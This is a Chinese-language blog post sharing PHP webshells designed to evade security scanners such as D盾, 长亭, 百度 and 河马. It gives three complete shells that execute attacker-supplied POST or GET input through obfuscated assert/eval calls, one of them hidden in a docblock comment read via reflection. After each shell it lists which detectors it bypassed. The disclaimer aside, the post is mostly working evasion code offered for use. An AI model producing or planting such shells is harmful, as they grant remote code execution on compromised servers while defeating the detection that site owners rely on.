过D盾php webshell免杀马探讨

前言：

本文章仅用于渗透交流学习，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任

最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结
在这个过程中发觉了其实webshell的bypass手法还是蛮多的
后缀bypass总结完了 经过实战也绕过了很多家最新的waf后缀
内容的还没写完 东西有点多

这里就分享一些php免杀的马 全过的也有贼多 但是暂时就不分享了

版本限制

使用条件：版本<7.1可用

这里发的是除了百度以外全过的（当然有全过的 但是暂时不会发出来）

马内容：

<?php

class get{
    
        public $x="";
        public $y="";
        public function setName($name=1){
    
                return $this -> name = $name;
        }
}
$obj = new get();
$s = $obj -> setName($name="ass");
$s = $s."ert";
$a = " $_POST[1]";
$b=null;
$s($b.$a);
?>

bypass情况：

最新版D盾

长亭

百度家的没过

在线的 这个不建议使用 效果就离普 其他都能查出的他不行

河马

版本未限制的

马1（这个只过了d盾 不太理解这个d盾为啥不查）

内容：

<?php  
    /** * assert($_GET[1+0]); */  
    class User {
     }  
    $user = new ReflectionClass('User');
    $comment = $user->getDocComment();
    $d = substr($comment , 14 , 20);
    eval($d);
?>

d盾

长亭

百度

河马也不过

马2

马内容：

<?php
class get{
    
        public $x="";
        public $y="";
        
        public function setName($name=1){
    
                return $this -> name = $name;
        }
}
$obj = new get();
$s = $obj -> setName($name="$_POST[1]");
eval($s);

bypass情况：
除百度其他的都过了

d盾

长亭的

百度

河马